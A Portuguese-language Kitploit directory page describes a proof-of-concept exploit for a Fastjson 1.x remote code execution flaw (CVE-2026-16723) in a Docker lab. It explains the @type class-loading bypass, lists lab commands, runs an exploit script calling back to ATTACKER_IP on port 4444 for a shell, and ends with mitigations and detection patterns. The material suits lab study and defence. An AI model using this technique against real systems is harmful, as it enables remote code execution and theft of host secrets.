Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-16723 — Exploit de PoC para RCE no Fastjson (CVE-2026-16723) com geração automatizada de payloads JAR e entrega via JSON elaborado, contornando as restrições do AutoType. | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2026-16723
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

Exploit de PoC para RCE no Fastjson (CVE-2026-16723) com geração automatizada de payloads JAR e entrega via JSON elaborado, contornando as restrições do AutoType.

Ver Repositório
1há 22 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Visão Geral

CVE-2026-16723 é uma vulnerabilidade de Execução Remota de Código (RCE) no Fastjson 1.x (1.2.68 – 1.2.83). Quando o Fastjson analisa JSON controlado pelo atacante, um valor @type malicioso é transformado em uma consulta de recurso de classe dentro de checkAutoType. Em um fat-JAR executável do Spring Boot, o carregador de classes resolve esse nome como uma URL jar:http:// e busca um JAR remoto (SSRF), depois carrega uma classe que contém a anotação @JSONType mesmo com o AutoType desabilitado. Como um JDK / Tomcat moderno rejeita o nome binário jar:http://, a variante confiável insere o JAR no cache da JVM e o lê novamente através de jar:file:/proc/self/fd/N, de modo que a classe é definida e seu inicializador estático é executado, resultando em execução de código. O AutoType permanece desabilitado e nenhum gadget de classpath é necessário.


Versões Afetadas

CategoriaVersão
VulnerávelFastjson 1.2.68 ≤ versão ≤ 1.2.83
CorrigidoMigre para Fastjson 2.x (sem correção na versão 1.x)

Impacto

  • Execução Remota de Código como a conta de serviço
  • Divulgação de segredos / credenciais do host e do ambiente
  • Comprometimento total do aplicativo afetado

Ambiente

O alvo do laboratório é uma loja pública (Northwind Store) cuja API de busca vincula o corpo da requisição com Fastjson. Tudo está no padrão original do Fastjson: SafeMode desativado, AutoType desativado, empacotado como um fat-JAR do Spring Boot.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
Pré-requisitoEstado neste laboratório
Fastjson 1.2.68 – 1.2.831.2.83
fat-JAR executável do Spring Bootsim
Caminho de análise JSON sem autenticaçãoPOST /api/products/search
SafeMode / AutoTypepadrão (ambos desativados)

PoC

O atacante e o alvo estão na mesma rede bridge do Docker, portanto o alvo alcança o atacante por meio de uma conexão de saída (nenhuma porta extra é publicada).

Etapa 1. Confirme que o alvo está ativo

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Etapa 2. Execute o exploit na máquina do atacante

exploit.py constrói o JAR do payload, o serve, inicia um listener e imprime o corpo da requisição. Apenas o endereço de callback é necessário.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Etapa 3. Entregue o payload

Cole o corpo impresso no endpoint de busca (Burp Repeater ou curl) e envie-o. A requisição de busca é um recurso normal; apenas o corpo JSON é forjado.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Etapa 4. Confirme o resultado

O código é executado como a conta de serviço. Obtenha a flag por meio do shell obtido:

root@kitploit:~
whoami

Mitigação

  • Migre para Fastjson 2.x
  • Ou execute com.alibaba:fastjson:1.2.83_noneautotype
  • Ou inicie a JVM com -Dfastjson.parser.safeMode=true
  • Detecção: valores @type no JSON contendo padrões jar:http ou jar:file / /proc/self/fd

Análise

  • KR:
  • EN:
Baixar ferramenta